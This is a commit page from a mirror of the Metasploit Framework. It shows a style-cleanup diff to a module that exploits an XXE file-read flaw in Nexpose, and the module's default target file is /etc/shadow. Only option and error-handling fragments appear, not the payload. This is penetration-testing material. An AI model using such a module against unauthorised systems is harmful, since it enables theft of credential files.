infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Cleanup various style issues 

* Unset default username and password
  * Register SSL as a DefaultOption instead of redefining it
  * Use the HttpClient mixin `ssl` instead of datastore.
  * Unless is better than if !
  * Try to store loot even if you can't cleanup the site ID.
bug/bundler_fix
Tod Beardsley 2013-08-16 14:03:59 -05:00
parent dfa1310304
commit f7339f4f77
1 changed files with 10 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
View File

@ -34,23 +34,25 @@ class Metasploit4 < Msf::Auxiliary
[ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ], [ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ],
# Fill this in with the direct advisory URL from Infigo # Fill this in with the direct advisory URL from Infigo
[ 'URL', 'http://www.infigo.hr/in_focus/advisories/' ] [ 'URL', 'http://www.infigo.hr/in_focus/advisories/' ]
] ],
'DefaultOptions' => {
'SSL' => true
}
)) ))
register_options( register_options(
[ [
Opt::RPORT(3780), Opt::RPORT(3780),
OptString.new('USERNAME', [true, "The Nexpose user", "user"]), OptString.new('USERNAME', [true, "The Nexpose user", nil]),
OptString.new('PASSWORD', [true, "The Nexpose password", "pass"]), OptString.new('PASSWORD', [true, "The Nexpose password", nil]),
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]), OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"])
OptBool.new('SSL', [true, 'Use SSL', true])
], self.class) ], self.class)
end end
def run def run
user = datastore['USERNAME'] user = datastore['USERNAME']
pass = datastore['PASSWORD'] pass = datastore['PASSWORD']
prot = datastore['SSL'] ? 'https' : 'http' prot = ssl ? 'https' : 'http'
nsc = Nexpose::Connection.new(rhost, user, pass, rport) nsc = Nexpose::Connection.new(rhost, user, pass, rport)
@ -119,11 +121,10 @@ class Metasploit4 < Msf::Auxiliary
begin begin
nsc.site_delete id nsc.site_delete id
rescue rescue
print_error("Error while cleaning up site") print_warning("Error while cleaning up site ID, manual cleanup required!")
return
end end
if !doc.root.elements["//host"] unless doc.root.elements["//host"]
print_error("No file returned. Either the server is patched or the file did not exist.") print_error("No file returned. Either the server is patched or the file did not exist.")
return return
end end